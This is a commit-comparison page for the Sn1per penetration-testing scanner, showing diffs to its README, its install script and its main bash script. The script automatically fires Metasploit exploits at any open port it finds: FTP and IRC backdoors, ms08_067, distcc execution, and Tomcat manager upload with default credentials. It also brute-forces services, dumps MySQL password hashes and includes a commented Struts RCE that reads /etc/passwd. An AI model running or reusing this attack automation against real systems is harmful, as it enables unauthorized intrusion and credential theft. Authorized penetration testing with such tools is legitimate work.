BitMaster/Sn1per
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: BitMaster:v1.8b
Branches Tags
BitMaster:master
BitMaster:v9.2 BitMaster:v9.1 BitMaster:v9.0 BitMaster:v8.9 BitMaster:v8.8 BitMaster:v8.7 BitMaster:v8.6 BitMaster:v8.5 BitMaster:v8.4 BitMaster:v8.3 BitMaster:v8.2 BitMaster:v8.1 BitMaster:v8.0 BitMaster:v7.4 BitMaster:v7.3 BitMaster:v7.2 BitMaster:v7.1 BitMaster:v7.0 BitMaster:v6.2 BitMaster:v6.1 BitMaster:v6.0 BitMaster:v5.10 BitMaster:v5.9 BitMaster:v5.8 BitMaster:v5.7 BitMaster:v5.6 BitMaster:v5.5 BitMaster:v5.4 BitMaster:v5.3 BitMaster:v5.2 BitMaster:v5.1 BitMaster:v5.0 BitMaster:v4.4 BitMaster:v4.3 BitMaster:v4.2 BitMaster:v4.1 BitMaster:v4.0 BitMaster:v3.0 BitMaster:v2.9 BitMaster:v2.8 BitMaster:v2.7 BitMaster:v2.6c BitMaster:v2.6 BitMaster:v2.5 BitMaster:v2.4 BitMaster:v2.3 BitMaster:v2.2 BitMaster:v2.1 BitMaster:v2.0 BitMaster:v1.9 BitMaster:v1.8c BitMaster:v1.8b BitMaster:v1.8a
..
compare: BitMaster:v1.8c
Branches Tags
BitMaster:master
BitMaster:v9.2 BitMaster:v9.1 BitMaster:v9.0 BitMaster:v8.9 BitMaster:v8.8 BitMaster:v8.7 BitMaster:v8.6 BitMaster:v8.5 BitMaster:v8.4 BitMaster:v8.3 BitMaster:v8.2 BitMaster:v8.1 BitMaster:v8.0 BitMaster:v7.4 BitMaster:v7.3 BitMaster:v7.2 BitMaster:v7.1 BitMaster:v7.0 BitMaster:v6.2 BitMaster:v6.1 BitMaster:v6.0 BitMaster:v5.10 BitMaster:v5.9 BitMaster:v5.8 BitMaster:v5.7 BitMaster:v5.6 BitMaster:v5.5 BitMaster:v5.4 BitMaster:v5.3 BitMaster:v5.2 BitMaster:v5.1 BitMaster:v5.0 BitMaster:v4.4 BitMaster:v4.3 BitMaster:v4.2 BitMaster:v4.1 BitMaster:v4.0 BitMaster:v3.0 BitMaster:v2.9 BitMaster:v2.8 BitMaster:v2.7 BitMaster:v2.6c BitMaster:v2.6 BitMaster:v2.5 BitMaster:v2.4 BitMaster:v2.3 BitMaster:v2.2 BitMaster:v2.1 BitMaster:v2.0 BitMaster:v1.9 BitMaster:v1.8c BitMaster:v1.8b BitMaster:v1.8a

2 Commits
v1.8b ... v1.8c

Author SHA1 Message Date
root
cf6540d8ff Merge branch 'master' of https://github.com/1N3/Sniper 2016-08-12 13:24:52 -04:00
root
a20343a3ee Sn1per by 1N3@CrowdShield 2016-08-12 13:24:07 -04:00
3 changed files with 85 additions and 70 deletions
Expand all files Collapse all files

27
README.md
View File

@@ -25,14 +25,15 @@ Sn1per is an automated scanner that can be used during a penetration test to enu
## USAGE:
```
# sniper <target> <report>
# sniper <target> stealth <report>
# sniper <CIDR> discover
# sniper <target> port <portnum>
# sniper <target> web <report>
# sniper <target> nobrute <report>
# sniper <targets.txt> airstrike <report>
# sniper <targets.txt> nuke <report>
sniper <target> <report>
sniper <target> stealth <report>
sniper <CIDR> discover
sniper <target> port <portnum>
sniper <target> web <report>
sniper <target> nobrute <report>
sniper <targets.txt> airstrike <report>
sniper <targets.txt> nuke <report>
sniper loot
```
### MODES:
@@ -44,6 +45,7 @@ Sn1per is an automated scanner that can be used during a penetration test to enu
* NOBRUTE: Launches a full scan against a target host/domain without brute forcing services.
* AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IP's that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
* NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
* LOOT: Automatically organizes and displays loot folder in your browser and opens Zenmap GUI with all port scan results. To run, type 'sniper loot'.
## SAMPLE REPORT:
```
@@ -51,6 +53,13 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc
```
## CHANGELOG:
* v1.8c - Added -A option to all NMap port scans
* v1.8c - Fixed install.sh permission issue
* v1.8c - Fixed install.sh cleanup options
* v1.8c - Added ssh-audit
* v1.8c - Added install directory (/usr/share/sniper/) to install script for universal access
* v1.8c - Fixed issue with Metasploit SSH scans
* v1.8c - Added auto-update to install.sh to automatically pull latest github release
* v1.8b - Fixed bug with NMap UDP scan options
* v1.8b - Fixed install.sh dependencies
* v1.8b - Fixed jexboss options
@@ -137,6 +146,4 @@ https://gist.github.com/1N3/8214ec2da2c91691bcbc
* v1.4 - Removed debug output from goohak from displaying on console
## FUTURE:
* Add install.sh for Ubuntu based systems
* Add install path to install.sh for universal access
* Add scan config options to enabled/disable certain scan tasks (ie. brute force, osint, web scans, etc.)

57
install.sh
View File

@@ -18,11 +18,16 @@ echo -e "$RESET"
echo -e "$OKORANGE + -- --=[http://crowdshield.com$RESET"
echo ""
DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
# DIR=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
INSTALL_DIR=/usr/share/sniper
echo -e "$OKGREEN + -- --=[This script will install or upgrade your Sn1per installation. Are you sure you want to continue?$RESET"
echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue?$RESET"
read answer
mkdir -p $INSTALL_DIR 2> /dev/null
cp -Rf $PWD/* $INSTALL_DIR
cd $INSTALL_DIR
echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
apt-get install dos2unix zenmap sslyze joomscan uniscan xprobe2 cutycapt unicornscan waffit host whois arachni theharvester dnsenum dirb dnsrecon curl nmap php5 php5-curl wapiti hydra iceweasel wpscan sqlmap arachni w3af golismero nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb python nbtscan sslscan amap
pip install dnspython colorama tldextract urllib3 ipaddress
@@ -32,7 +37,7 @@ gem install rake
gem install ruby-nmap net-http-persistent mechanize text-table
echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
rm -Rf Findsploit/ Brutex/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ CrackMapExec/
rm -Rf Findsploit/ Brutex/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ CrackMapExec/ serializekiller/
echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
git clone https://github.com/1N3/Findsploit.git
@@ -41,29 +46,29 @@ git clone https://github.com/1N3/Goohak.git
git clone https://github.com/1N3/XSSTracer.git
git clone https://github.com/1N3/MassBleed.git
git clone https://github.com/1N3/SuperMicro-Password-Scanner
git clone https://github.com/1N3/HTTPoxyScan.git
git clone https://github.com/Dionach/CMSmap.git
git clone https://github.com/0xsauby/yasuo.git
git clone https://github.com/johndekroon/serializekiller.git
git clone https://github.com/aboul3la/Sublist3r.git
git clone https://github.com/nccgroup/shocker.git
git clone https://github.com/joaomatosf/jexboss.git
git clone https://github.com/byt3bl33d3r/CrackMapExec.git
git clone https://github.com/drwetter/testssl.sh.git
git clone https://github.com/lunarca/SimpleEmailSpoofer
git clone https://github.com/arthepsy/ssh-audit
echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
mkdir loot 2> /dev/null
cp -f $DIR/bin/clamav-exec.nse /usr/share/nmap/scripts/ 2> /dev/null
chmod +x $DIR/sniper
chmod +x $DIR/bin/dnsdict6
chmod +x $DIR/Goohak/goohak
chmod +x $DIR/XSSTracer/xsstracer.py
chmod +x $DIR/MassBleed/massbleed
chmod +x $DIR/MassBleed/heartbleed.py
chmod +x $DIR/MassBleed/openssl_ccs.pl
chmod +x $DIR/SuperMicro-Password-Scanner/supermicro_scan.sh
chmod +x $DIR/testssl.sh/testssl.sh
cp -f $INSTALL_DIR/bin/clamav-exec.nse /usr/share/nmap/scripts/ 2> /dev/null
chmod +x $INSTALL_DIR/sniper
chmod +x $INSTALL_DIR/bin/dnsdict6
chmod +x $INSTALL_DIR/Goohak/goohak
chmod +x $INSTALL_DIR/XSSTracer/xsstracer.py
chmod +x $INSTALL_DIR/MassBleed/massbleed
chmod +x $INSTALL_DIR/MassBleed/heartbleed.py
chmod +x $INSTALL_DIR/MassBleed/openssl_ccs.pl
chmod +x $INSTALL_DIR/MassBleed/winshock.sh
chmod +x $INSTALL_DIR/SuperMicro-Password-Scanner/supermicro_scan.sh
chmod +x $INSTALL_DIR/testssl.sh/testssl.sh
rm -f /usr/bin/sniper
rm -f /usr/bin/goohak
rm -f /usr/bin/xsstracer
@@ -72,17 +77,17 @@ rm -f /usr/bin/copysploit
rm -f /usr/bin/compilesploit
rm -f /usr/bin/massbleed
rm -f /usr/bin/brutex
ln -s $DIR/sniper /usr/bin/sniper
ln -s $DIR/Goohak/goohak /usr/bin/goohak
ln -s $DIR/XSSTracer/xsstracer.py /usr/bin/xsstracer
ln -s $DIR/Findsploit/findsploit /usr/bin/findsploit
ln -s $DIR/Findsploit/copysploit /usr/bin/copysploit
ln -s $DIR/Findsploit/compilesploit /usr/bin/compilesploit
ln -s $DIR/MassBleed/massbleed /usr/bin/massbleed
ln -s $DIR/BruteX/brutex /usr/bin/brutex
ln -s $DIR/testssl.sh/testssl.sh /usr/bin/testssl
echo -e "$OKORANGE + -- --=[For universal sniper access, be sure to edit sniper to include the full path for the SNIPER_DIR variable. $RESET"
rm -f /usr/bin/testssl
ln -s $INSTALL_DIR/sniper /usr/bin/sniper
ln -s $INSTALL_DIR/Goohak/goohak /usr/bin/goohak
ln -s $INSTALL_DIR/XSSTracer/xsstracer.py /usr/bin/xsstracer
ln -s $INSTALL_DIR/Findsploit/findsploit /usr/bin/findsploit
ln -s $INSTALL_DIR/Findsploit/copysploit /usr/bin/copysploit
ln -s $INSTALL_DIR/Findsploit/compilesploit /usr/bin/compilesploit
ln -s $INSTALL_DIR/MassBleed/massbleed /usr/bin/massbleed
ln -s $INSTALL_DIR/BruteX/brutex /usr/bin/brutex
ln -s $INSTALL_DIR/testssl.sh/testssl.sh /usr/bin/testssl
echo -e "$OKORANGE + -- --=[Done!$RESET"
echo -e "$OKORANGE + -- --=[To run, type 'sniper'! $RESET"

71
sniper
View File

@@ -31,9 +31,9 @@
# ./sniper loot
#
# UNCOMMENT AND SET TARGET DIR FOR UNIVERSAL ACCESS (ie. sniper <target>)
# cd /pentest/web/Sn1per/
cd /usr/share/sniper/
clear
#clear
TARGET="$1"
MODE="$2"
@@ -82,7 +82,7 @@ else
SCAN_TYPE="DOMAIN"
fi
clear
#clear
if [ "$MODE" = "report" ]; then
./sniper $TARGET | tee ./loot/sniper-$TARGET-`date +%Y%m%d%H%M`.txt 2>&1
@@ -516,7 +516,7 @@ then
echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET"
nmap -sV -sC -T5 -p 21 --script=ftp-* $TARGET
nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
@@ -525,8 +525,11 @@ then
echo -e "$OKRED + -- --=[Port 22 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 22 opened... running tests...$RESET"
nmap -sV -sC -T5 -p 22 --script=ssh-* $TARGET
msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$PWD"/BruteX/wordlists/simple-users.txt; setg RHOSTS "$TARGET"; setg "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
cd ssh-audit
python ssh-audit.py $TARGET:22
cd ..
nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$PWD"/BruteX/wordlists/simple-users.txt; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
fi
if [ -z "$port_23" ];
@@ -536,7 +539,7 @@ else
echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET"
echo ""
cisco-torch -A $TARGET
nmap -sV -T5 --script=telnet* -p 23 $TARGET
nmap -A -sV -T5 --script=telnet* -p 23 $TARGET
msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;"
fi
@@ -545,7 +548,7 @@ then
echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET"
nmap -sV -T5 --script=smtp* -p 25 $TARGET
nmap -A -sV -T5 --script=smtp* -p 25 $TARGET
smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET
msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;"
fi
@@ -555,7 +558,7 @@ then
echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET"
nmap -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET
nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET
fi
if [ -z "$port_79" ];
@@ -563,7 +566,7 @@ then
echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET"
nmap -sV -T5 --script=finger* -p 79 $TARGET
nmap -A -sV -T5 --script=finger* -p 79 $TARGET
bin/fingertool.sh $TARGET BruteX/wordlists/simple-users.txt
fi
@@ -637,7 +640,7 @@ else
then
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -sV -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal
nmap -A -sV -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
dirb http://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -676,7 +679,7 @@ then
echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 110 opened... running tests...$RESET"
nmap -sV -T5 --script=pop* -p 110 $TARGET
nmap -A -sV -T5 --script=pop* -p 110 $TARGET
fi
if [ -z "$port_111" ];
@@ -695,7 +698,7 @@ then
else
echo -e "$OKORANGE + -- --=[Port 135 opened... running tests...$RESET"
rpcinfo -p $TARGET
nmap -p 135 -T5 --script=rpc* $TARGET
nmap -A -p 135 -T5 --script=rpc* $TARGET
fi
if [ -z "$port_139" ];
@@ -708,7 +711,7 @@ else
enum4linux $TARGET
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
fi
@@ -718,7 +721,7 @@ then
else
echo -e "$OKORANGE + -- --=[Port 162 opened... running tests...$RESET"
for a in `cat BruteX/wordlists/snmp-community-strings.txt`; do snmpwalk $TARGET -c $a; done;
nmap -p 162 --script=snmp* $TARGET
nmap -A -p 162 --script=snmp* $TARGET
fi
if [ -z "$port_389" ];
@@ -726,7 +729,7 @@ then
echo -e "$OKRED + -- --=[Port 389 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 389 opened... running tests...$RESET"
nmap -p 389 -T5 --script=ldap* $TARGET
nmap -A -p 389 -T5 --script=ldap* $TARGET
fi
if [ -z "$port_443" ];
@@ -805,7 +808,7 @@ else
if [ "$MODE" = "web" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -sV -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal
nmap -A -sV -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
dirb https://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -851,7 +854,7 @@ else
enum4linux $TARGET
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
fi
@@ -860,7 +863,7 @@ then
echo -e "$OKRED + -- --=[Port 512 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 512 opened... running tests...$RESET"
nmap -sV -T5 -p 512 --script=rexec* $TARGET
nmap -A -sV -T5 -p 512 --script=rexec* $TARGET
fi
if [ -z "$port_513" ]
@@ -868,7 +871,7 @@ then
echo -e "$OKRED + -- --=[Port 513 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 513 opened... running tests...$RESET"
nmap -sV -T5 -p 513 --script=rlogin* $TARGET
nmap -A -sV -T5 -p 513 --script=rlogin* $TARGET
fi
if [ -z "$port_514" ];
@@ -884,7 +887,7 @@ then
echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET"
nmap -sV -T5 --script=nfs* -p 2049 $TARGET
nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET
rpcinfo -p $TARGET
showmount -e $TARGET
smbclient -L $TARGET -U " "%" "
@@ -895,7 +898,7 @@ then
echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET"
nmap -sV -T5 --script=ftp* -p 2121 $TARGET
nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET
msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
@@ -904,7 +907,7 @@ then
echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET"
nmap -sV --script=mysql* -p 3306 $TARGET
nmap -A -sV --script=mysql* -p 3306 $TARGET
mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
fi
@@ -913,7 +916,7 @@ then
echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET"
nmap -p 3310 -T5 -sV --script clamav-exec $TARGET
nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET
fi
if [ -z "$port_3128" ];
@@ -921,7 +924,7 @@ then
echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET"
nmap -p 3128 -T5 -sV --script=*proxy* $TARGET
nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET
fi
if [ -z "$port_3389" ];
@@ -929,7 +932,7 @@ then
echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET"
nmap -sV -T5 --script=rdp-* -p 3389 $TARGET
nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET
rdesktop $TARGET &
fi
@@ -938,7 +941,7 @@ then
echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET"
nmap -sV -T5 --script=distcc-* -p 3632 $TARGET
nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET
msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
fi
@@ -947,7 +950,7 @@ then
echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET"
nmap -sV --script=pgsql-brute -p 5432 $TARGET
nmap -A -sV --script=pgsql-brute -p 5432 $TARGET
fi
if [ -z "$port_5800" ];
@@ -955,7 +958,7 @@ then
echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET"
nmap -sV -T5 --script=vnc* -p 5800 $TARGET
nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET
fi
if [ -z "$port_5900" ];
@@ -963,7 +966,7 @@ then
echo -e "$OKRED + -- --=[Port 5900 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET"
nmap -sV -T5 --script=vnc* -p 5900 $TARGET
nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
fi
if [ -z "$port_6000" ];
@@ -971,7 +974,7 @@ then
echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET"
nmap -sV -T5 --script=x11* -p 6000 $TARGET
nmap -A -sV -T5 --script=x11* -p 6000 $TARGET
fi
if [ -z "$port_6667" ];
@@ -979,7 +982,7 @@ then
echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET"
nmap -sV -T5 --script=irc* -p 6667 $TARGET
nmap -A -sV -T5 --script=irc* -p 6667 $TARGET
msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
fi
@@ -1035,7 +1038,7 @@ else
cd ..
nikto -h http://$TARGET:8080
cutycapt --url=http://$TARGET:8080 --out=loot/$TARGET-port8080.jpg
nmap -p 8080 -T5 --script=*proxy* $TARGET
nmap -A -p 8080 -T5 --script=*proxy* $TARGET
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
@@ -1085,7 +1088,7 @@ else
cd ..
nikto -h https://$TARGET:8443
cutycapt --url=https://$TARGET:8443 --out=loot/$TARGET-port8443.jpg
nmap -p 8443 -T5 --script=*proxy* $TARGET
nmap -A -p 8443 -T5 --script=*proxy* $TARGET
python jexboss/jexboss.py -host https://$TARGET:8443
fi